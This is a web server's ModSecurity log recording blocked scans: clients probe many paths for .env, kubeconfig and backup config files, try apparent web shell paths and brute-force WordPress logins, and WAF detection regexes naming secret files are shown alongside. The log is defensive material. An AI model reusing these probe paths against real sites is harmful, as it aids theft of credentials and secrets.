[Tue May 26 19:56:37.132891 2026] [security2:error] [pid 93576:tid 93764] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.kube/config.old"] [unique_id "ahWtnWDRMqfxdEDkoszesgAAADQ"]
[Tue May 26 19:56:37.470574 2026] [security2:error] [pid 93576:tid 93712] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/docker/compose/withPostgres/.env"] [unique_id "ahWtnWDRMqfxdEDkoszeuwAAAAA"]
[Tue May 26 19:56:38.486216 2026] [security2:error] [pid 93576:tid 93833] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/flask_app/.env"] [unique_id "ahWtnmDRMqfxdEDkoszeywAAAHk"]
[Tue May 26 19:56:38.654093 2026] [security2:error] [pid 93576:tid 93757] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nodes/.env"] [unique_id "ahWtnmDRMqfxdEDkoszezwAAAC0"]
[Tue May 26 19:56:39.612013 2026] [security2:error] [pid 93576:tid 93779] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtn2DRMqfxdEDkosze3QAAAEM"]
[Tue May 26 19:56:39.658037 2026] [security2:error] [pid 93868:tid 94262] [client 158.62.210.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtn0qK9k_ZUB2Vp25dWAAAAZM"], referer: https://www.anujtradingco.com/
[Tue May 26 19:56:39.669961 2026] [security2:error] [pid 93576:tid 93780] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/secrets.yml~"] [unique_id "ahWtn2DRMqfxdEDkosze4wAAAEQ"]
[Tue May 26 19:56:40.176850 2026] [security2:error] [pid 93576:tid 93832] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/music/.env"] [unique_id "ahWtoGDRMqfxdEDkosze6AAAAHg"]
[Tue May 26 19:56:40.284217 2026] [security2:error] [pid 93576:tid 93776] [client 20.151.111.128:3784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWtoGDRMqfxdEDkosze6wAAAEA"], referer: www.google.com
[Tue May 26 19:56:40.284504 2026] [security2:error] [pid 93576:tid 93767] [client 20.151.111.128:13024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-plain.php"] [unique_id "ahWtoGDRMqfxdEDkosze7AAAADc"], referer: www.google.com
[Tue May 26 19:56:40.515047 2026] [security2:error] [pid 93576:tid 93730] [client 185.177.72.53:65346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/chats/.env"] [unique_id "ahWtoGDRMqfxdEDkosze8gAAABI"]
[Tue May 26 19:56:40.994729 2026] [security2:error] [pid 93868:tid 94339] [client 158.62.210.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWtoEqK9k_ZUB2Vp25djgAAAeA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1157062&moderation-hash=c23f0f591a039229d82b3f206724dd57
[Tue May 26 19:56:41.203895 2026] [security2:error] [pid 93868:tid 94278] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/manual/.env"] [unique_id "ahWtoUqK9k_ZUB2Vp25dlQAAAaM"]
[Tue May 26 19:56:41.407390 2026] [security2:error] [pid 93868:tid 94329] [client 20.151.111.128:3778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWtoUqK9k_ZUB2Vp25dmgAAAdY"]
[Tue May 26 19:56:41.559042 2026] [security2:error] [pid 93868:tid 94296] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/compose/.env"] [unique_id "ahWtoUqK9k_ZUB2Vp25dnQAAAbU"]
[Tue May 26 19:56:41.772726 2026] [security2:error] [pid 93576:tid 93801] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtoWDRMqfxdEDkoszfAAAAAFk"]
[Tue May 26 19:56:42.756502 2026] [security2:error] [pid 93576:tid 93797] [client 14.191.187.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtomDRMqfxdEDkoszfJAAAAFU"]
[Tue May 26 19:56:42.798823 2026] [security2:error] [pid 93868:tid 94337] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/clientes/laravel_inbox/.env"] [unique_id "ahWtokqK9k_ZUB2Vp25dywAAAd4"]
[Tue May 26 19:56:43.150960 2026] [security2:error] [pid 93868:tid 94276] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/slim/.env"] [unique_id "ahWto0qK9k_ZUB2Vp25d3AAAAaE"]
[Tue May 26 19:56:43.173943 2026] [security2:error] [pid 93868:tid 94336] [client 20.151.111.128:3780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/qlgxnsvq.php"] [unique_id "ahWto0qK9k_ZUB2Vp25d3QAAAd0"], referer: www.google.com
[Tue May 26 19:56:43.504176 2026] [security2:error] [pid 93868:tid 94284] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.save.old"] [unique_id "ahWto0qK9k_ZUB2Vp25d7AAAAak"]
[Tue May 26 19:56:43.611415 2026] [security2:error] [pid 93576:tid 93784] [client 20.151.111.128:12492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWto2DRMqfxdEDkoszfPgAAAEg"]
[Tue May 26 19:56:43.679812 2026] [security2:error] [pid 93868:tid 94343] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nestjs-app/api/.env"] [unique_id "ahWto0qK9k_ZUB2Vp25d9gAAAeQ"]
[Tue May 26 19:56:43.760117 2026] [security2:error] [pid 93868:tid 94313] [client 199.45.154.124:60678] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWto0qK9k_ZUB2Vp25d9QAAAcY"]
[Tue May 26 19:56:43.993092 2026] [security2:error] [pid 93868:tid 94357] [client 20.151.111.128:3804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWto0qK9k_ZUB2Vp25eCgAAAfI"], referer: www.google.com
[Tue May 26 19:56:44.140873 2026] [security2:error] [pid 93576:tid 93727] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWto2DRMqfxdEDkoszfQQAAAA8"]
[Tue May 26 19:56:44.386811 2026] [security2:error] [pid 93868:tid 94335] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/social-app/server/.env"] [unique_id "ahWtpEqK9k_ZUB2Vp25eGgAAAdw"]
[Tue May 26 19:56:45.099262 2026] [security2:error] [pid 93576:tid 93606] [remote 51.91.98.45:36568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtpWDRMqfxdEDkoszfUAAAKxs"]
[Tue May 26 19:56:45.272428 2026] [security2:error] [pid 93868:tid 94375] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/db/secret.bak"] [unique_id "ahWtpUqK9k_ZUB2Vp25ePAAAAgQ"]
[Tue May 26 19:56:45.306616 2026] [security2:error] [pid 93868:tid 94279] [client 20.151.111.128:3075] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-plain.php"] [unique_id "ahWtpUqK9k_ZUB2Vp25ePgAAAaQ"], referer: www.google.com
[Tue May 26 19:56:45.449022 2026] [security2:error] [pid 93868:tid 94362] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/oauth.php.bak"] [unique_id "ahWtpUqK9k_ZUB2Vp25eQgAAAfc"]
[Tue May 26 19:56:45.600584 2026] [security2:error] [pid 93576:tid 93611] [remote 121.200.216.55:32802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtpWDRMqfxdEDkoszfVAAAZSA"]
[Tue May 26 19:56:45.749172 2026] [security2:error] [pid 93576:tid 93612] [remote 92.205.109.21:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWtpWDRMqfxdEDkoszfWAAAJyE"]
[Tue May 26 19:56:46.052455 2026] [security2:error] [pid 93576:tid 93614] [remote 51.91.98.45:36568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtpWDRMqfxdEDkoszfZAAANyM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:56:46.341050 2026] [security2:error] [pid 93868:tid 94309] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/developerslv/.env"] [unique_id "ahWtpkqK9k_ZUB2Vp25eZgAAAcI"]
[Tue May 26 19:56:46.524111 2026] [security2:error] [pid 93868:tid 94299] [client 20.151.111.128:3136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWtpkqK9k_ZUB2Vp25ebgAAAbg"]
[Tue May 26 19:56:46.608541 2026] [security2:error] [pid 93868:tid 94371] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtpkqK9k_ZUB2Vp25eYQAAAgA"]
[Tue May 26 19:56:46.873855 2026] [security2:error] [pid 93868:tid 94350] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/control/.env"] [unique_id "ahWtpkqK9k_ZUB2Vp25eeQAAAes"]
[Tue May 26 19:56:46.936999 2026] [security2:error] [pid 93868:tid 94370] [client 46.105.39.50:10167] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahWtpkqK9k_ZUB2Vp25efAAAAf8"]
[Tue May 26 19:56:46.937098 2026] [security2:error] [pid 93868:tid 94370] [client 46.105.39.50:10167] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahWtpkqK9k_ZUB2Vp25efAAAAf8"]
[Tue May 26 19:56:47.582540 2026] [security2:error] [pid 93868:tid 94343] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/facebook-bot/src/.env"] [unique_id "ahWtp0qK9k_ZUB2Vp25ejgAAAeQ"]
[Tue May 26 19:56:47.758162 2026] [security2:error] [pid 93868:tid 94339] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api-gateway/.env"] [unique_id "ahWtp0qK9k_ZUB2Vp25elAAAAeA"]
[Tue May 26 19:56:48.012154 2026] [security2:error] [pid 93868:tid 94296] [client 20.151.111.128:12399] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/drtgcqmg.php"] [unique_id "ahWtqEqK9k_ZUB2Vp25eogAAAbU"], referer: www.google.com
[Tue May 26 19:56:48.751670 2026] [security2:error] [pid 93868:tid 94258] [client 20.151.111.128:3166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWtqEqK9k_ZUB2Vp25ewwAAAY8"]
[Tue May 26 19:56:49.351511 2026] [security2:error] [pid 93868:tid 94271] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/bot/.env"] [unique_id "ahWtqUqK9k_ZUB2Vp25e3gAAAZw"]
[Tue May 26 19:56:49.354294 2026] [security2:error] [pid 93868:tid 94364] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtqEqK9k_ZUB2Vp25ezgAAAfk"]
[Tue May 26 19:56:49.526909 2026] [security2:error] [pid 93868:tid 94279] [client 185.177.72.53:56978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/env/config.bak"] [unique_id "ahWtqUqK9k_ZUB2Vp25e5QAAAaQ"]
[Tue May 26 19:56:49.859292 2026] [security2:error] [pid 93576:tid 93734] [client 20.9.81.163:35684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWtqWDRMqfxdEDkoszfrwAAABY"]
[Tue May 26 19:56:49.859474 2026] [security2:error] [pid 93576:tid 93734] [client 20.9.81.163:35684] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "gcirsm.org.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWtqWDRMqfxdEDkoszfrwAAABY"]
